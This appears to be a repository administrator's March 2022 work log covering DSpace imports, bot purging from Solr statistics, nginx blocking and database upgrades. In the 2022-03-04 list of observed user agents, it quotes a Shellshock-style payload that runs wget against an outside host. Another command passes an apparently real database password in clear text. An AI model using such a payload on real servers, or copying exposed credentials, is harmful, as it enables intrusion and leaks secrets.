---
title: "March, 2022"
date: 2022-03-01T16:46:54+03:00
author: "Alan Orth"
categories:
---
## 2022-03-01
- Send Gaia the last batch of potential duplicates for items 701 to 980:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
```
## 2022-03-04
- Looking over the CGSpace Solr statistics from 2022-02
- I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more!
- Here are some of the more prevalent or weird ones:
  - axios/0.21.1
  - Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
  - Nutraspace/Nutch-1.2 (www.nutraspace.com)
  - Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
  - Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
  - Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
  - Crowsnest/0.5 (+http://www.crowsnest.tv/)
  - Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
  - metha/0.2.27
  - ZaloPC-win32-24v454
  - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
  - ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
  - FullStoryBot/1.0 (+https://www.fullstory.com)
  - Link Validity Check From: http://www.usgs.gov
  - OSPScraper (+https://www.opensyllabusproject.org)
  - () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832"
- I submitted a pull request to COUNTER-Robots with some of these
- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics
Total number of bot hits purged: 12914
```
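For reference, what the purge boils down to is a delete-by-query against the `userAgent` field of the Solr statistics core; a minimal sketch with curl of what I understand the script to be doing, assuming Solr on localhost:8081 and using one of the patterns above (the exact query it builds may differ):

```console
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" \
    -H "Content-Type: text/xml" \
    --data-binary '<delete><query>userAgent:/axios\/[0-9].*/</query></delete>'
```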
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
## 2022-03-05
- Start AReS harvest
## 2022-03-10
- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)
```
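For what it's worth, the same ID filter can also be done on the command line with csvkit, which I'm already using for these batches; a rough sketch with the IDs abbreviated and an illustrative output path:

```console
$ csvgrep -c id -r '^(707|709|710|711|713|717|718|821)$' ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-deletes.csv
```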
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
```
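The SimpleArchiveFormat bundle itself comes out of SAFBuilder; roughly, that step looks like this (the CSV path is illustrative, and the CSV needs a filename column pointing at the PDFs alongside it):

```console
$ ./safbuilder.sh -c /tmp/2022-03-10-tac-batch4.csv
```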
## 2022-03-12
- Update all containers and rebuild OpenRXV on linode20:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
- Then run all system updates and reboot
- Start a full harvest on AReS
## 2022-03-16
- Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing
## 2022-03-20
- Start a full harvest on AReS
## 2022-03-21
- Review a few submissions for Open Repositories 2022
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed
## 2022-03-22
- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
- I had been meaning to update my local database...
- I re-imported the CGIAR CAS documents to DSpace Test and generated the PDF thumbnails:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
```
- On my local environment I decided to run the `check-duplicates.py` script one more time with all 700 items:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
```
- I sent the resulting 76 items to Gaia to check
- UptimeRobot said that CGSpace was down
- I looked and found many locks belonging to the REST API application:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
    301 dspaceWeb
   2390 dspaceApi
```
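Those application names are what the grep above is matching from `pg_stat_activity`, so a follow-up query to see what the REST API connections are actually doing would be something like this (a sketch):

```console
$ psql -c "SELECT pid, state, wait_event_type, left(query, 60) FROM pg_stat_activity WHERE application_name = 'dspaceApi';"
```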
- Looking at nginx's logs, I found the top addresses making requests today:
```console
# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
1977 45.5.184.2
3167 70.32.90.172
4754 54.195.118.125
5411 205.186.128.185
6826 137.184.159.211
```
- 137.184.159.211 is on DigitalOcean using this user agent: `GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28`
- I blocked this IP in nginx and the load went down immediately
- 205.186.128.185 is on Media Temple, but it's OK because it's the CCAFS publications importer bot
- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
- 70.32.90.172 is on Media Temple and has no user agent
- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
- I verified it works as expected with an empty user agent:
```console
$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
```
- I note that the nginx log shows '-' for a request with an empty user agent, which makes it indistinguishable from a request whose user agent is a literal '-', for example these were successful:
```console
70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
```
- I can only assume that these requests used a literal '-' so I will have to add an nginx rule to block those too (a quick curl test for that case is sketched after this list)
- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester... I should ask Macaroni Bros about that
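A minimal way to confirm that case before writing the rule is to send a literal '-' user agent and check the status code; a sketch against DSpace Test, which presumably still returns HTTP 200 given the log entries above:

```console
$ curl -s -o /dev/null -w '%{http_code}\n' -H 'User-Agent: -' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
```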
## 2022-03-24
- Maria from ABC asked about a reporting discrepancy on AReS
- I think it's because the last harvest was over the weekend, and she was expecting to see items submitted this week
- Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted
- She asked if we can download them and upload them directly to CGSpace
- I re-created my local Artifactory container
- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
- One thing I realized is that OAI is no longer a standalone web application; it is part of the `server` app now: http://localhost:8080/server/oai/request?verb=Identify
- Deploy PostgreSQL 12 on CGSpace (linode18) but don't switch over yet, because I see some users active (a quick pg_stat_activity check for this is sketched below)
- I did this on DSpace Test in 2022-02 so I just followed the same procedure
- After that I ran all system updates and rebooted the server
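That "users active" check is easy to do from `pg_stat_activity`; a minimal sketch, assuming the database is named dspace:

```console
$ psql -c "SELECT application_name, count(*) FROM pg_stat_activity WHERE datname = 'dspace' GROUP BY application_name;"
```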
## 2022-03-25
- Looking at the PostgreSQL database size on CGSpace after the update yesterday:
- The space saving in indexes of recent PostgreSQL releases is awesome!
- Import a DSpace 6.x database dump from production into my local DSpace 7 database
- I still see the same errors [I saw in 2021-04]({{< relref "2021-04.md" >}}) when testing DSpace 7.0 beta 5
- I had to delete some old migrations, as well as all Atmire ones first:
```console
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
```
- Then I was able to migrate to DSpace 7 with `dspace database migrate ignored`, as the DSpace upgrade notes say
- I see that the flash of unstyled content bug still exists on dspace-angular... ouch!
- Start a harvest on AReS
## 2022-03-26
- Update dspace-statistics-api to Falcon 3.1.0 and release v1.4.3
## 2022-03-28
- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
```console
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
```
- I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
- Abenet and I noticed 1,735 items in CTA's community that have the title "delete"
- We asked Peter and he said we should delete them
- I exported the CTA community metadata and used OpenRefine to filter all items with the "delete" title, then used the "expunge" bulkedit action to remove them (a sketch of the CLI round trip is below)
- I realized I forgot to clean up the old Let's Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
- I also removed the pre-Ubuntu 20.04 Let's Encrypt stuff from the Ansible infrastructure playbooks
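For the record, a sketch of the CTA cleanup round trip with the DSpace CLI: the community handle and file names here are hypothetical, the CSV exported from OpenRefine needs an action column set to expunge for the rows to remove, and expunging via bulk edit has to be allowed in the DSpace configuration:

```console
$ dspace metadata-export -i 10568/XXXXX -f /tmp/cta.csv
$ dspace metadata-import -f /tmp/cta-delete.csv -e fuuu@example.com
```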
## 2022-03-29
- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('33')),
isNotNull(value.match('179')),
isNotNull(value.match('452')),
isNotNull(value.match('489')),
isNotNull(value.match('541')),
isNotNull(value.match('568')),
isNotNull(value.match('646')),
isNotNull(value.match('889'))
)
```
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
```console
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
```
- After that I did some normalization on the `cg.subject.system` metadata and extracted a few dozen countries to the country field
- Start a harvest on AReS
## 2022-03-30
- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well:

```console
$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
```
- I started looking into the request regarding the CIAT Library PDFs
- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
- The links seem to be down though! I emailed Paola to ask
## 2022-03-31
- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
- I will do the following for CMS and G1GC on DSpace Test:
  - Wait for startup
  - Reload home page
  - Log in
  - Do a search for "livestock"
  - Click AGROVOC facet for livestock
  - `dspace index-discovery -b`
  - `dspace-statistics-api index`
- With CMS the Discovery Index took:
```console
real    379m19.245s
user    267m17.704s
sys     4m2.937s
```
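For reference, switching between the two collectors is mostly a matter of the GC flag in Tomcat's JAVA_OPTS; a minimal sketch of the two variants, with all other tuning options omitted:

```console
# CMS (the current baseline on DSpace Test)
JAVA_OPTS="$JAVA_OPTS -XX:+UseConcMarkSweepGC"
# G1GC (the candidate)
JAVA_OPTS="$JAVA_OPTS -XX:+UseG1GC"
```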
- Leroy from CIAT said that the CIAT Library server has security issues so it was limited to internal traffic
- I extracted a list of URLs from CGSpace to send him:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
COPY 4552
```
- I did some checks and cleanups in OpenRefine because there are some values with "#page" etc
- Once I sorted and de-duplicated them there were only ~2,700 unique URLs, which means almost two thousand items point to a PDF shared with another item (a quick shell check is sketched below)
- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
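The fragment cleanup and unique count are quick to sanity check in the shell, and the same list makes it easy to spot-check whether the links respond; a sketch against the exported CSV, skipping the header row:

```console
$ tail -n +2 /tmp/2022-03-31-ciat-library-urls.csv | sed 's/#.*//' | sort -u > /tmp/ciat-library-urls-unique.txt
$ wc -l /tmp/ciat-library-urls-unique.txt
$ head -n 5 /tmp/ciat-library-urls-unique.txt | xargs -I{} curl -s -o /dev/null -w '%{http_code} {}\n' '{}'
```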